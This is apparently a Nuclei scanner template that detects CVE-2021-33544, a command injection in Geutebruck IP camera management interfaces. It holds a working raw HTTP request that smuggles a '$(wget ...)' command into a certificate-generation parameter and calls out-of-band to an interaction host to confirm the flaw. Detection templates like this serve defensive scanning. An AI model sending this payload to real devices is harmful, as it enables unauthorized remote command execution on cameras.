37 lines
1.4 KiB
YAML
37 lines
1.4 KiB
YAML
id: CVE-2021-33544
|
|
|
|
info:
|
|
name: Geutebruck - Remote Command Injection
|
|
author: gy741
|
|
severity: high
|
|
description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
|
reference:
|
|
- https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
|
|
- https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/
|
|
- https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-33544
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2021-33544
|
|
cwe-id: CWE-77
|
|
epss-score: 0.97513
|
|
tags: cve,cve2021,geutebruck,rce,oast
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
# Enhanced by mp on 2022/06/30
|